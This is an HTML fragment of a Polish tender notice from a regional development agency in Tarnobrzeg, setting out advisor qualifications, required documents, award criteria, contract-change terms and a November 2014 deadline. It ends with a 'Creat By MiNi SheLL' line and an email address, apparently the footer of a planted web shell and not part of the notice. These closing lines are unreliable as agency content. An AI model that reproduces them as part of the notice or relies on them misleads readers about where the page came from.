ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455),
Doświadczenie zawodowe:
- min. 2-letnie doświadczenie zawodowe w tym min. 1 rok doświadczenia w świadczeniu usług o charakterze doradczym oraz min. 1 rok doświadczenia w pozyskiwaniu środków publicznych w szczególności EFS,
lub
- min. 2-letnie doświadczenie zawodowe na stanowisku specjalisty ds. informacji w Regionalnym  Ośrodku EFS.

Dotyczy Zadania 5
 Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej 1 osobą  posiadającą:
kwalifikacje doradcy specjalistycznego w zakresie zamówień publicznych;
Wykształcenie:
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455), kierunek wykształcenia zgodny ze specjalizacją w jakiej udziela doradztwa tj. prawnicze lub jako zamiennik wykształcenia wyższego może być traktowane co najmniej 5 - letnie doświadczenie zawodowe w danej dziedzinie
Doświadczenie zawodowe:
min. 3-letnie doświadczenie zawodowe ( w tym co najmniej  ostatnie 2 lata doświadczenia w dziedzinie , w której będzie świadczone doradztwo specjalistyczne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Dodatkowe kwalifikacje osób, którymi Wykonawca dysponuje lub będzie dysponował - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. Zmiana wyłącznie w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy.
Warunek dokonania zmiany: zmiana prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;
Warunek dokonania zmiany: zmiana  w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia
3)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
Warunek dokonania zmiany: zmiana wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
4)	gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia;
Warunek dokonania zmiany: zaistnienie obiektywnych okoliczności.
5)	Zmiana osób, podwykonawców i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają osoby i podmioty zmieniane. Zmiany te mogą nastąpić z przyczyn organizacyjnych pod warunkiem, że osoby wykonawcy, podwykonawcy, grupy wykonawców i innych podmiotów spełniają wszystkie  wymogi wynikające z SIWZ i złożonej oferty. 
Warunek dokonania zmiany: zaistnienie przyczyn organizacyjnych;
6)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego, 
b) działania siły wyższej, uniemożliwiającej wykonanie zamówienia w określonym pierwotnie terminie,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tarnobrzeska Agencja Rozwoju Regionalnego S.A.
ul. Sandomierska 25
39-400 Tarnobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2014 godzina 10:00, miejsce: Sekretariat Zamawiającego 
Tarnobrzeg ul. Sandomierska 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki
Priorytet X Pomoc techniczna
Działanie10.1 Pomoc techniczna
Tytuł przedsięwzięcia: Regionalny Ośrodek Europejskiego Funduszu Społecznego wTarnobrzegu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com